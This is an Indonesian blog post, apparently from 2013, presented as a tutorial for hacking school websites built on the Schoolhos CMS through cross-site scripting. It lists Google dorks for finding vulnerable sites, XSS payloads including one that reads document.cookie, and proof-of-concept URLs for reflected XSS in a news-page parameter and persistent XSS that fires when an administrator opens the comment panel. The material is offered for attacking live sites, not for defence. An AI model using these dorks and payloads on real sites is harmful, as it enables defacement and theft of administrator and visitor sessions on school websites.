Tutorial Hack Situs Sekolah CMS Schoolhos - XSS !


Hallo sobat blogger kali ini saya akan share exploit yang ke 3 nih :D langsung saja di simak secara singkat ya ?

Google Dork: 
inurl:/?p=bukutamu
intext:Schoolhos Free Open Source CMS

CONTOH XSS :
<script>alert('veriztiarta');</script>
<script>alert(document.cookie);</script>
<script>window.open("http://predator-technology.blogspot.com/")</script>

POC : 
 http://www.contoh.com/index.php?p=detberita&id=XSS


- Presistent XSS :
POC :
http://www.contoh.com/adminpanel/komentar.ph <--- Apabila Si Admin melihat/masuk di halaman ini, script akan otomatis ter eksekusi.

http://www.contoh.com/index.php?p=detberita&id=XSS <--- Jika user / urang yang sedang browsing di halaman yang anda kenai XSS, otomatis script XSS anda ter eksekusi :D

ok sekian dulu ya artikel ini sampai bertemu kembali Next Article !! :D
Anda baru saja membaca artikel yang berkategori Hacking dengan judul Tutorial Hack Situs Sekolah CMS Schoolhos - XSS !. Anda bisa bookmark halaman ini dengan URL http://predator-technology.blogspot.com/2013/08/tutorial-hack-situs-sekolah-cms_1.html. Terima kasih!
Ditulis oleh: VeRZaW#021 - 2 August 2013

Belum ada komentar untuk "Tutorial Hack Situs Sekolah CMS Schoolhos - XSS !"

Post a Comment

Mohon Memberi Komentar dengan Kata-Kata yang Sopan !!